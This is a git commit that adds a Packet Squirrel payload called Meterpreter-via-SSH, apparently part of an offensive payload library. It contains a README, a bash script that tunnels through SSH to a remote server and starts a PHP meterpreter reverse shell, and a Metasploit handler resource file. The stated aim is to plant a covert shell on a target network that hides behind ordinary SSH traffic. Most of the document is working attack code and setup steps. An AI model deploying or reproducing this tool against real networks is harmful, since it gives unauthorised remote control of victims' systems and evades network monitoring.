added Meterpreter-via-SSH payload (#27)

2017-12-26 23:53:25 -05:00 · 2017-12-26 23:53:25 -05:00 · 261fb62b10
parent 06479075e0
commit 261fb62b10
3 changed files with 133 additions and 0 deletions
--- a/payloads/library/remote-access/Meterpreter-via-SSH/README.md
+++ b/payloads/library/remote-access/Meterpreter-via-SSH/README.md
@ -0,0 +1,50 @@
+# Meterpreter-via-SSH
+
+## Overview
+This payload starts Packet Squirrel in NAT mode and awaits for user input. When the button is pressed, the payload connects to a remote SSH server and creates a local port tunnel. It then launches a meterpreter shell over said tunnel.
+
+The intent is to get a meterpreter shell on a target network in a way that hides meterpreter network traffic behind legitimate SSH activity.
+
+## Operational Design Considerations
+* Payload remains silent on the network until user presses the button.
+* Payload stops the SSH connection if meterpreter shell fails.
+* Payload always keeps only 1 copy of SSH+meterpreter processes running (even if the button is pressed many times).
+
+## Getting Started
+Copy the payload to Packet Squirrel into desired switch folder, then edit the script to configure your server options:
+* SSH_USER - username on remote SSH server
+* SSH_HOST - ip/domain of remote SSH server
+
+In case you choose to change the default meterpreter port, don't forget to change it on the metasploit side as well.
+* MSF_PORT - port of meterpreter listener
+
+### Generate SSH Key on Squirrel
+You will likely have to generate an ssh key-pair (use default location and empty password) on your Packet Squirrel:
+```
+root@squirrel:~# ssh-keygen
+```
+### Allow Squirrel on SSH Server
+Then you will need to copy the contents of /root/.ssh/id_rsa.pub from Packet Squirrel to the SSH server authorized file:
+```
+user@server:~# mkdir ~/.ssh
+user@server:~# echo 'paste id_rsa.pub contents inside this quote' > ~/.ssh/authorized_keys
+```
+### Run Metasploit with Resource 
+```
+msf@server:~# msfconsole -r server.rc
+```
+
+## LED Definitions
+1. Configure NETMODE 
+* Solid Magenta
+2. Connect to SSH Server
+* SUCCESS - Blink Amber 5 Times
+* FAIL - Blink Red 2 Times
+3. Launch meterpreter
+* SUCCESS - Blink Cyan 1 Time
+* FAIL - Blink Red 1 Time
+
+## Hardening Recommendations
+1. Use an account with limited privileges for SSH access on the server.
+2. Use a dedicated account for Packet Squirrel device (audit usage with SSH access logs).
+3. Disable PasswordAuthentication in sshd_config on the server.
--- a/payloads/library/remote-access/Meterpreter-via-SSH/payload.sh
+++ b/payloads/library/remote-access/Meterpreter-via-SSH/payload.sh
@ -0,0 +1,74 @@
+#!/bin/bash
+# Title:         Meterpreter-via-SSH
+# Description:   Covert meterpreter shell via overt SSH connection
+# Author:        Zappus
+# Version:       1.0
+# Category:      Remote-Access
+# Net Mode:      NAT
+# Firmware:      1.2
+# 
+# LED State Descriptions
+# Magenta Solid - Configuring NETMODE
+# LED OFF - Waiting for BUTTON
+# Red Blink 2 Times - SSH Connection Failed
+# Amber Blink 5 Times - SSH Connection Successful
+# Red Blink 1 Time - Meterpreter Failed
+# Cyan Blink 1 Time - Meterpreter Successful
+
+
+SSH_USER="username"
+SSH_HOST="hostname"
+MSF_PORT=31337
+
+function start()
+{
+        LED SETUP
+        NETMODE NAT
+        sleep 5
+        LED OFF
+        
+        # Wait until BUTTON is pressed 
+        while true
+        do
+                NO_LED=1 BUTTON  && {
+                        # close any existing meterpreter and SSH connections
+                        kill `pgrep php` 2> /dev/null
+                        kill `pgrep -x ssh` 2> /dev/null
+                        sleep 2
+
+                        # Establish connection to remote SSH server
+                        ssh -f -N -T -M -L $MSF_PORT:127.0.0.1:$MSF_PORT $SSH_USER@$SSH_HOST
+
+                        # Check if SSH connection worked
+                        if [ -z `pgrep -x ssh` ]
+                        then
+                                LED FAIL
+                                sleep 5
+                                LED OFF
+                                continue
+                        else
+                                LED STAGE1
+                                sleep 5
+                        fi
+
+                        # Start meterpreter reverse shell
+                        meterpreter-php 127.0.0.1 $MSF_PORT &
+                        sleep 2
+
+                        # Check if meterpreter shell started
+                        if [ -z `pgrep php` ]
+                        then
+                                # Close SSH connection because meterpreter failed
+                                kill `pgrep -x ssh` 2> /dev/null
+                                LED FAIL
+                        else
+                                LED SPECIAL
+                        fi
+                        sleep 1
+                        LED OFF
+                        }
+        done
+}
+
+# Start the payload
+start &
--- a/payloads/library/remote-access/Meterpreter-via-SSH/server.rc
+++ b/payloads/library/remote-access/Meterpreter-via-SSH/server.rc
@ -0,0 +1,9 @@
+use exploit/multi/handler
+set payload php/meterpreter/reverse_tcp
+set EnableContextEncoding false
+set DisablePayloadHandler false
+set ExitOnSession false
+set ListenerTimeout 0
+set LHOST 127.0.0.1
+set LPORT 31337
+run -j